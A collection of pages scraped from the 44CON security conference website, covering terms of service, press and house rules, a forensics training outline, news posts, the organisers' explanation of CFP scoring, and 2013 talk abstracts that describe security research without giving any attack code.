          SECTION 19 - DELIVERY

           

          Merchandise (purchased on their own)

          UK orders will be delivered using Royal Mail and International orders will be despatched via Royal Mail or Parcel Force. 

          Merchandise (purchased with conference ticket)

          They will be available for pick-up at the conference at the registration/merchandise desk upon presentation of proof of purchase.

          Pre-ordered DVDs will be shipped after the conference.

          Conference ticket

          Conference tickets with be sent electronically.

           

          SECTION 20 - CANCELLATIONS AND RETURNS

           

          Merchandise Returns

          We hope that you will be delighted with your purchases from 44CON. If however, you want to return your purchase, you may do so within 14 days of your purchase, provided that your purchase is in its original condition. Please contact us at 44con@44con.com before returning any purchase.

          Please note that you will be responsible for the postage costs of the items returned unless we delivered the item to you in error, or if the item is damaged or defective.

          Once your return is received and inspected, we will send you an email to notify you that we have received your returned item. We will also notify you of the approval or rejection of your refund.

          If you are approved, then your refund will be processed, and a credit will automatically be applied to your credit card or original method of payment, within a certain amount of days. 

          Conference Tickets

          Conference and training tickets are non-refundable.

          In the event that a ticket holder is unable to attend, a substitute may attend in their place provided that the organisers are notified in advance of the conference.  Please contact 44con@44con.com to arrange or if you want help with the substitution.

          Training courses require a minimum number of attendees to be conducted. We reserve the right to cancel a course if minimum numbers are not reached up to 2 weeks prior to the event. In the event that a course is cancelled, we will notify the ticket holders and offer to transfer them to another course or provide refund information. 

           

          SECTION 21 - CHANGES TO TERMS OF SERVICE

           

          You can review the most current version of the Terms of Service at any time at this page. 

          We reserve the right, at our sole discretion, to update, change or replace any part of these Terms of Service by posting updates and changes to our website. It is your responsibility to check our website periodically for changes. Your continued use of or access to our website or the Service following the posting of any changes to these Terms of Service constitutes acceptance of those changes.

           

          SECTION 22 - CONTACT INFORMATION

           

          Questions about the Terms of Service should be sent to us at 44con@44con.com.

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Creează un cont nou
          #####EOF##### 44CON 2017 Sponsorship Opportunities Available – 44CON

          44CON 2017 Sponsorship Opportunities Available

          44CON 2017, now in its seventh successful year, is recognised as a “must-attend” conference for security professionals. Offering unparalleled networking, cutting-edge presentations and thought leadership across the information security arena, we aim to ensure attendees have a great time. This year we had over 400 people attend, that added with speakers from across the world delivering awesome talks on relevant and up to date topics makes 44CON one of the UK’s premier conferences.

          44CON 2017 will take place from the 13th – 15th September 2017 at the ILEC Conference Centre, London. There will also be a number of training courses taking place before 44CON 2017. If you have a training proposal you wish us to consider, please email emma@44con.com for more information.

          If you wish to become one of our awesome sponsors, then please take a look at our 44CON 2017 sponsor pack. If you have any questions or want to discuss any of the opportunities further please email sponsorops@44con.com

           

          #####EOF##### Press Information – 44CON

          Press Information

          This page contains information relevant to members of the press. Whether you’re thinking of covering 44CON for your personal blog or a mainstream media outlet, we’d appreciate it if you read this anyway.

          Press Office

          There is a press office at our conferences where registered members of the press can conduct interviews and access the 44CON press team. The room has sufficient space for stands, cameras and microphones to be set up but this has to be arranged in advance.

          Guidelines

          44CON conferences are events for all sorts of information security related people who come from many walks of life and have different world views. People expect a certain right to non-intrusive behaviour. While registered press are welcome, unregistered press members will be asked to leave. In order to make everyone’s experience better, the following house rules apply:

          • Press must register as press in advance
          • Your press pass must be worn at all times
          • Except for 44CON photographers, filming and photography is not permitted in the auditorium area
          • No pictures of participants may be taken without explicit permission
          • A certain number of free press tickets are available – please contact for details
          • If you are writing an article about 44CON please let us know in advance so we can link to your organisation’s web site

          If in doubt, please ask a helper as ejection from the conference often offends. For registration, queries and notification please e-mail us.

          #####EOF##### 44CON House Rules – 44CON

          44CON House Rules

          44CON House Rules

          44CON is welcoming to all. We’ve drafted these house rules to help you understand our guiding behavioural principle: Wheaton’s Law (“Don’t be a dick”). Our house rules aren’t perfect, they’re a work in progress and we’re open to suggestions via houserules@44con.com.

          These rules apply to everyone and all interpersonal interactions at the event.

          Expectations

          What we want you to get from 44CON: Knowledge. New friends. Job Opportunities. Good times.
          What we expect from you: Respect for others. Being kind. Not being a dick.

          Interpreting Wheaton’s Law

          Our crew leads are the arbiters of Wheaton’s Law. Their decision is final. If you’re given an instruction from a crew member, please follow it. If you’re given a warning, please heed it.

          Banter, a playful, friendly exchange of teasing remarks, is fine. If it’s not consensual, it’s not banter.

          Reporting concerns

          1. If you have a concern, please raise it with the clearly visible crew or at the front desk.
          2. Alternatively, please fill in a feedback form, anonymously if you prefer.
          3. If the above isn’t possible, please email houserules@44con.com with your concern.
          4. Everything is handled in confidence and we can provide space and support where needed.

          We welcome anonymous feedback, but it affects our ability to communicate outcomes.

          Grounds for removal

          We reserve the right to remove anyone from the event without reimbursement for, but not limited to, the following behaviours;

          1. Theft.
          2. Sustained harassment, discrimination or disruption.
          3. Acts of violence.
          4. Criminal activity.
          5. Any other reason where the relevant crew lead believes that your continued presence may cause a risk to the safety of yourself, others or where Wheaton’s Law has been breached to such a degree that you have acted an epic dick.

          Please note: Laws at home may not match those here. In particular, free speech isn’t protected, our computer crime laws are ridiculous and both harassment and discrimination are criminal offences.

          #####EOF##### Erik Hjelmvik: Network Forensics Training – 44CON

          Erik Hjelmvik: Network Forensics Training

          Presented By: Erik Hjelmvik

          The network forensics training class consists of a mix of theory and hands-on labs, where students will learn to analyze Full Packet Capture (FPC) files. The scenarios in the labs are primarily focused at network forensics for incident response, but are also relevant for law enforcement/internal security etc. where the network traffic of a suspect or insider is being monitored.

          The 2 day course will take place on the 12th & 13th September 2017 at etc venues The Hatton.

          Cost is £ 1,300.00 (inc VAT). Buy your place in our shop now.

          Course Outline

          Day 1: Theory and Practice using Open Source Tools

          • Theory: Ethernet signalling
          • Hardware: Network TAPs and Monitor ports / SPAN ports
          • Sniffers: Recommendations for high-performance packet interception
          • PCAP analysis: Extracting evidence and indicators of compromise using open source tools
          • Defeating Big Data: Techniques for working with large data sets
          • Whitelists: Learn how to detect 0-day exploit attacks without using IDS signatures
          • Challenge Day 1: Find the needle in our haystack and win a honourable prize!

          Day 2: Advanced Network Forensics using Netresec Tools

          • NetworkMiner Professional: Learning to leverage the features available in the Pro version
            • Port Independent Protocol Identification (PIPI)
            • DNS Whitelisting
          • NetworkMinerCLI: Automating content extraction with our command line tool
          • CapLoader: Searching, sorting and drilling through large PCAP data sets
            • Super fast flow transcript (aka Follow TCP/UDP stream)
            • Filter PCAP files and export frames to other tools
            • Keyword search
          • Challenge Day 2

          The Scenario

          The scenario used in the class involves a new progressive Bank, which provides exchange services for Bitcoin and Litecoin. We’ve set up clients and a server for this bank using REAL physical machines and a REAL internet connection. All traffic on the network is captured to PCAP files by a SecurityOnion sensor. In the scenario this bank gets into lots of trouble with hackers and malware, such as:

          • Defacement of the Bank’s web server (see zone-h mirror)
          • Man-on-the-Side (MOTS) attack (much like NSA/GCHQ’s QUANTUM INSERT)
          • Backdoor infection through trojanized software
          • Spear phishing
          • Use of a popular RAT (njRAT) to access the victims machine and exfiltrate the wallet.dat files for Bitcoin and Litecoin
          • Infection with real malware (Nemucod, Miuref / Boaxxe and more)

          Class attendees will learn to analyse captured network traffic from these events in order to:

          • Investigate web server compromises and defacements
          • Detect Man-on-the-Side attacks
          • Identify covert backdoors
          • Reassemble incoming emails and attachments
          • Detect and decode RAT/backdoor traffic
          • Detect malicious traffic without having to rely on blacklists, AV or third-party detection services

          Professional software included FREE of charge

          Each attendee will be provided with a free personal single user license of NetworkMiner Professional and CapLoader. These licenses will be valid for six months from the first training day.

          Target Audience

          Incident responders, digital forensics specialists and anyone else who want to improve their skills at finding evil stuff in full content packet captures.

          Student Requirements

          Previous experience using Wireshark to analyse network traffic is recommended.

          You don’t need to be a bash expert, but please don’t attend this training if you are afraid of using Linux command line tools.

          What to Bring

          Attendees will need to bring a laptop that fits the following specs:

          • A PC running any 64 bit Windows OS (can be a Virtual Machine)
          • At least 4GB RAM
          • At least 40 GB free disk space
          • VirtualBox (64 bit) installed (VMWare will not be supported in the training)

          A VirtualBox VM will be provided on USB flash drives at the beginning of the training.

          Please note that having a 64-bit CPU and a 64-bit OS is not always enough to support 64-bit virtualisation. You might need to enable features such as ”AMD-V”, ”VT-x” or ”Hyper-V” in BIOS in order to run virtual machines in 64-bit mode. You might also need to turn off “Intel Trusted Execution” in BIOS. One way to verify that your laptop supports 64-bit virtualisation is to download the SecurityOnion ISO and see if it boots up in VirtualBox.

          About the Trainer

          Erik Hjelmvik is an incident responder and developer who is well known in the network forensics field for having created NetworkMiner, which is used by incident responders and law enforcement all around the world. Erik has a background in SCADA security and has spent over 5 years doing incident response at one of the best CERTs in Sweden. Nowadays Erik runs the company Netresec AB, where he develops network forensics software and occasionally teaches network forensic classes.

           

          Book your 44CON 2017 training course now!

          #####EOF##### Nathalie – 44CON

          Tickets for 44CON 2016 are on sale

          44CON 2016 tickets are now on sale in our shop go and get yours now!

          We also have 4 great training courses by Saumil Shah, Dawid Czagan, Joe FitzPatrick, Dominic Chell and Marcus Pinto, go check them out and book your place early to avoid disappointment as courses will be cancelled if minimum numbers are not reached 3 weeks before the conference.

          44CON is the UK’s premier annual technical security conference and training event. 44CON 2016 will be taking place from the evening of the 14th September until the 16th September at the ILEC Conference Centre, you can expect a jam packed few days of awesome talks, food and of course alcohol. 

          Our CFP closes tonight (Friday 10th June) so if you have something awesome to share get it in now before it’s too late.

          Finally, check this great day out at the Farnborough International Air Show from our friends at Suits & Spooks on 14th July, Counterespionage: the need for speed, and use the code 44CON for a 5% discount on both package options.

          Dawid Czagan’s training course is still going ahead

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan‘s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, on the 27th and 28th April 2016. It will take place at the ILEC Conference Centre.

          Do check it out!

          44CON Cyber Security 2016 Cancelled

          Unfortunately we’ve had some problems with the 44CON Cyber Security event that we just couldn’t overcome. Some of these issues were small, like crew numbers, while others such as unexpected price hikes for us were simply insurmountable without breaking the cost model. Furthermore, the presence of so many great events in the UK from BSides London and Manchester, through to Securitay meant that a separate event was becoming harder to justify in an already busy calendar.

          When we started 44CON Cyber Security last year, we set out to create an exhibition for the Infosec community without the infosuck. We wanted to create an event that was free (or at least super cheap), that was different to 44CON London but had its spirit (if not its Gin) and a place where people more involved in end-user business security functions could come together without the fear of heavy-handed barcode scanning. We believe we mostly succeeded, but only as a result of the enormous effort our crew of volunteers put in and Adrian’s hard work.

          Unfortunately this year both Adrian and Steve have had less time to work on 44CON Cyber Security, and with fewer volunteers able to plug the gaps, we felt that if we couldn’t deliver an event on par with last year that perhaps it would be better to focus on making 44CON London an even better event, which is what we’re going to do.

          We’ll be in touch with everyone with a ticket for 44CON Cyber Security to let them know that it’s not going ahead, and to give them the option of a full refund or discounted entry to 44CON London, and of course to apologise for any inconvenience. But it’s not all bad news…

          Traditionally, 44CON London has had an Infosec track and a technical track. Last year had no Infosec track because of 44CON Cyber Security. This year, the Infosec track will be back with a vengeance.

          It’s going to be awesome.

          If you have any questions, please email 44con@44con.com, and we’ll do our best.

          Adrian & Steve

          Training course at 44CON Cyber Security 2016

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan‘s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, which we will be running after 44CON Cyber Security 2016, on the 27th and 28th April 2016. It will hopefully take place at the same venue as the conference.

          Do check it out!

          44CON sponsor CRESTcon & IISP Congress

          crestiisp_2016logo

          44CON are pleased to announce that we are sponsoring the CRESTcon & IISP Congress event taking place on 10 March 2016.

          Following the success of the sell-out event in 2015, CRESTCon & IISP Congress 2016 will take place on 10th March at the Royal College of Surgeons. In response to the increased demand for tickets and feedback from delegates, they have expanded the event by adding a third stream and a larger demo area. Get your ticket here quickly!

          44CON sponsor CRESTcon & IISP Congress

          crestiisp_2016logo

          44CON are pleased to announce that we are sponsoring the CRESTcon & IISP Congress event taking place on 10 March 2016.

          Following the success of the sell-out event in 2015, CRESTCon & IISP Congress 2016 will take place on 10th March at the Royal College of Surgeons. In response to the increased demand for tickets and feedback from delegates, they have expanded the event by adding a third stream and a larger demo area. Get your ticket here quickly!

          44CON London 2015 – Thank you for making it great

          Well, that’s 44CON London over for another year!
          We would like to thank all of our sponsors, speakers and attendees for making this year’s event a success. The atmosphere and great talks made this year’s 44CON London a great place to be. We hope you all managed to bag some nice swag.
          If you didn’t manage to make it to all of the talks then you can see the slides here.
          Now that this year’s 44CON London is over, we will be focusing on our upcoming April event, 44CON Cyber Security. This will be taking place on Tuesday 26th April 2016 at the ILEC Conference Centre, London.
          Tickets will be on sale shortly, so keep a look out on our twitter page @44CON or sign up to our mailing list where you will be the first to know about all things 44CON.

          #####EOF##### How to game the 44CON CFP – 44CON

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          A gypsy fortune teller brings her crystal ball to life to read the future.
          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you're not sure what's happening, contact us and we'll give you an update.
          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5.What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.
          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first serve basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get less than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that if your main talk is about the theory, try a play-along walkthrough on how to do this in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

          2 thoughts on “How to game the 44CON CFP

          Comments are closed.

          #####EOF##### 44CON 2013 Presentations – 44CON

          44CON 2013 Presentations

          A talk about (info-sec) talks

          Presented By: Haroon Meer

          Last year there was an Information Security conference taking place for almost every day of the year. This translates to about 15 information security talks per day, every day. The question is, is this a bad thing? Even niche areas of the info-sec landscape have their own dedicated conference these days. Is this a good thing?

          The conference scene is actually a reasonable proxy for the state of information security as a discipline.. i.e. theres a lot of activity but with questionable results (and dodgy metrics).

          This talk aims to change (some of) that.


          Surviving the 0-day – Reducing the Window of Exposure

          Presented By: Andreas Lindh

          According to the NIST National Vulnerability Database, 1772 software vulnerabilities with a CVSS score of 7 or higher were disclosed in 2012, and 2013 is so far (at the time of writing) not looking any better.

          A lot of times the window of exposure – from when a vulnerability is discovered to when a patch has been deployed – is very long. In a corporate environment, it’s not unusual to rely solely on patch management and semi-static security tools such as firewalls, IPS and antivirus for protection, and because of various reasons patch deployment might take a long time or may not even be possible.

          This talk will discuss why patch management is insufficient for protection against new vulnerabilities, how the traditional “defense in depth” model needs to be re-architected, and finally how the window of exposure can be reduced by active response before incidents occur.


          Evading Identification and Detection by Messing with Binary Formats

          Presented By: Ange Albertini

          Malwares and exploits rely on many different file formats. It’s critical for security softwares to accurately identify and parse them, and ideally tell if they are corrupted, clean or malicious. Some formats can sadly be combined, making it possible to create files that evade filtering or detection. Moreover, the gap between the documentation and the possible implementations leave room for valid files to entirely evade detection.


          Honey I’m Home!! – Hacking Z-Wave Home Automation Systems.

          Presented By: Behrang Fouladi & Sahand Ghanoun

          “Smart homes” employing a variety of home automation systems are becoming increasingly common. Heating, ventilation, security and entertainment systems are centrally controlled with a mixture of wired and wireless networking. In 2011 the UK market for home automation products was estimated at £65 million, an increase of 12% on the previous year, with the US market exceeding $3 billion. Zigbee and Z-Wave wireless protocols underpin most home automation systems. Z-Wave is growing in popularity as it does not conflict with existing 2.4GHz wifi and Bluetooth systems. Our talk describes the Z-Wave protocol and a number of weaknesses, including how to build a low-cost attack kit to perform packet capture and injection, along with potential attacks on the AES crypto implementation.


          Reverse Engineering with HackRF

          Presented By: Michael Ossmann

          Software Defined Radio (SDR) has given us an unprecedented ability to perform over-the-air reverse engineering of proprietary digital radio systems. This entire presentation is one long demonstration, a case study in SDR reversing. I’ll show how I use HackRF to perform radio protocol security analysis without any prior knowledge of the target system required.


          Breaking Bad Programs

          Presented By: Don A. Bailey

          Offensive tactics against executable code have traditionally been measured in repeatable predictable steps. This is suitable for an attack against a single processes, thread, or kernel function path. As exploitation evolves, so must our methodologies. Today’s offensive tactics are getting more robust. However, we are seeing very few attacks against moving targets in computer systems. In this presentation, the speaker intends to demonstrate the technical strategies for building attacks based on causality; or, the ability for one action to affect one or more known or unknown objects. Also, I may prank call Bryan Cranston just to be a dick.


          A Fast Hard Disk with Active Antiforensics

          Presented By: Travis Goodspeed

          When a computer reads from a hard disk, it is actually speaking over the bus to a program that runs inside of that disk’s CPU. In this presentation, I will demonstrate a practical antiforensics hard disk that is fast enough to boot from and to work from. While the disk functions normally for a legitimate user, it will erase itself in response to any attempt to image the disk with DD(1) or similar disk imaging tools. To be fair to both attackers and defenders, this presentation will also demo expected vulnerabilities that can be exploited to allow for complete imaging.


          Punking Punkbuster

          Presented By: Isaac Dawson

          This presentation will cover the methods and process used while trying to understand how PunkBuster works. From writing custom tools, to coming up with novel ways of overcoming many obstacles, this personal project has been an enlightening journey. I will cover the various components, how they interact, their anti-debugging and analysis tricks and will give the attendees a greater understanding of how this anti-cheating service was implemented. I will cover how and why I have taken the paths I did, as that is far more important than any code or disassembly listing.


          Security Lessons from Dictators

          Presented By: Jerry Gamblin

          What do the Grand Ayatollah Seyyed Ali Hosseini Khamenei, Kim Jong-un, Julius Caesar, Abraham Lincoln, Napoleon Bonaparte and Adolph Hitler have to do with network security? Come and discover the mistakes these dictators made and what they can teach us about network security and how to apply them to our companies and coworkers.


          .Net Havoc – Manipulating Properties of Dormant Server Side Web Controls

          Presented By: Shay Chen

          Most modern web application frameworks use Server-Side Web Controls to enhance the development process; components that other platforms require the developer to implement can be dragged and dropped into the page design view.

          These components are also protected using a variety of mechanisms, including digital signatures, content restrictions and even invisibility.

          However, developers that use these components improperly can expose their application to a variety of different attacks that can be executed despite, and sometimes due to the existence of security mechanisms.


          The Forger’s Art: Exploiting XML Digital Signature Implementations

          Presented By: James Forshaw

          Many security critical systems rely on the correct implementation of the XML Digital Signature standard for the purposes of verification and identity management. Technologies such as SAML and Web Service Security use the standard, and its sibling XML Encryption, to manage the security of these technologies. Being a standard there is, unsurprisingly, no canonical implementation for any platform or language, with so many different developments there are likely to be differences in how the standard is interpreted.

          This presentation is about research done against the main open and closed source implementations of XML Digital Signatures, how they can be exploited to gain remote code execution, signature verification bypass or denial of service. It will show some of the more nasty vulnerabilities found during the research including a novel attack against the built-in Java and .NET libraries which allow for trivial signature spoofing exposing any user of those implementations into accepting an invalid signature which is independent of their usage.


          A Captive Audience

          Presented By: Jaime Cochran

          In modern societies we perceive prisons and jails as places where well deserving citizens endlessly ponder the wrongs they’ve enacted. But, as we all readily admit, history tells us a far different story about prisons. In this lecture, the presenter will discuss the effects of imprisonment in the technological age. Technology can be used to pin down the weak and ensnare alternative voices. Electrically controlled gates, video cameras, biometrics, and other technologies can enforce confinement to a seemingly rigid pace. But, what if technology can be used to flip the scales in the favor of the condemned? We intend to discuss technologies to help inmates communicate with the outside, empowering voices from within the World’s darkest dictatorships. High speed light communication, clever phone tricks, and even astonishing every day objects can be subverted for use in confinement scenarios. The take away from this talk? No matter how you feel pinned down in life, there is always a weakness waiting to be exploited for the benefit of your voice. Let freedom ring!


          Persistent, Stealthy, Remote-controlled Dedicated Hardware Malware

          Presented By: Patrick Stewin

          In this work we present a stealthy malware that exploits dedicated hardware on the target system and remains persistant across boot cycles. The malware is capable of gathering valuable information such as passwords. Because the infected hardware can perform arbitrary main memory accesses, the malware can modify kernel data structures and escalate privileges of processes executed on the system.

          The malware itself is a DMA malware implementation referred to as DAGGER. DAGGER exploits Intel’s Manageability Engine (ME), that executes firmware code such as Intel’s Active Management Technology (iAMT), as well as its OOB network channel. We have recently improved DAGGER’s capabilites to include support for 64-bit operating systems and a stealthy update mechanism to download new attack code.


          I miss LSD

          Presented By: Tim Brown

          A wise man once said (paraphrased) “if you want to find UNIX bugs, compare and contrast the Linux and Solaris man pages”. Following on from my previous work on linker bugs and more recently AIX (at 44CON 2012), we’ll look at some of the more interesting areas of the POSIX specification, focusing on the various IPC mechanisms that can be found in modern POSIX alike OS as well as kernel land more generally. I’ll present some new tools I’ve written to aid in this analysis along with some discussion around how I uncovered potentially exploitable bugs in ~400 Debian GNU/Linux packages in a single day.


          Building Antibodies – The Phishing program at Twitter.

          Presented By: Dan Tentler

          I run the internal phishing program at Twitter. It was built from scratch and uses open source tools. It’s custom tailored to our organization. This talk will describe the objective of running an internal phishing program at your organization, what to track, how to measure, and how to grow the program. This is not an awareness program, this program is designed to imbue antibodies into the culture that will promote the growth of a security culture and help make people more security aware overall. Since the instantiation of this program at twitter we have seen dramatic changes that make the whole organization safer. There are some configurations an org can employ to dramatically decrease the influx of spam and phishing mails on top of a program such as this. If more orgs had a program like this, phishing would start to become much harder to do. The measurements that come from this program allow us to have a much better view of the risks attached to phishing as well, so we have a tangible, measurable result we can work with. You want to be the guy who designs attack models for your company, then lobs them at employees? This is how to do it.


          Best Practices and the Future of Adaptive Authentication

          Presented By: Robert Weiss & Ben Gatti

          The talk is a deep-dive into the details of authentication focused on best practices and future technologies.


          Even More Tamagotchis Were Harmed in the Making of this Presentation

          Presented By: Natalie Silvanovich

          You might remember Tamagotchi virtual pets from the 1990’s. These toys are still around and just as demanding as ever! This talk covers my latest efforts at hacking Tamagotchis. First, I will detail methods for executing code on and dumping code from a Tamagotchi, and then delve into the deep secrets of Tamagotchi life that only code can tell. Finally, I will describe the internals of the Tamagotchi’s GeneralPlus microcontroller and demonstrate some projects that can be built using a modified Tamagotchi.


          My quest into FM-RDS

          Presented By: Oona Räisänen

          This talk will concentrate on my experiences with FM-RDS (Radio Data System), a digital subcarrier embedded in FM broadcast transmissions, and also cryptanalysis of traffic messages contained therein.

          I originally found about the existence of such transmissions in a roundabout way, by using a spectrum analyzer program to examine intermodulation distortion in my radio’s Line Out audio. As it turned out, the inaudibly quiet distortion, probably caused by the radio’s stereo demuxer circuitry, contained all the information needed to decode all RDS data present in the transmission. I will demonstrate the journey I took and give a short introduction to how the data is actually encoded. Live acquisition of local RDS data depending on signal conditions in the premises.


          Reversing and Exploiting BT CPE Devices

          Presented By: Zachary Cutlip

          In this talk I’ll describe the process by which I reverse engineered the firmware for the BT HomeHub 3.0b and developed a remote exploit that yields root access. The BT HomeHub 3.0b was fairly challenging to reverse engineer and exploit compared to many SOHO routers on the market today. The talk will describe several strategies I pursued in search of an exploitable 0-day. Although some strategies were fruitful and some not, all were instructive.

          Live demos and root prompts are the funnest part of any good security talk, and this one will not disappoint. I’ll demonstrate the exploit and pop root on a HomeHub 3.0b in front of the live audience. Then I’ll demonstrate how to upload tools to the device for instrumentation and attack. If all goes well, I’ll up the ante by attempting a parlor trick made possible by the technical nature of this specific exploit.


          Signatureless Breach Detection Under The Microscope

          Presented By: Olli-Pekka Niemi & Antti Levomäki

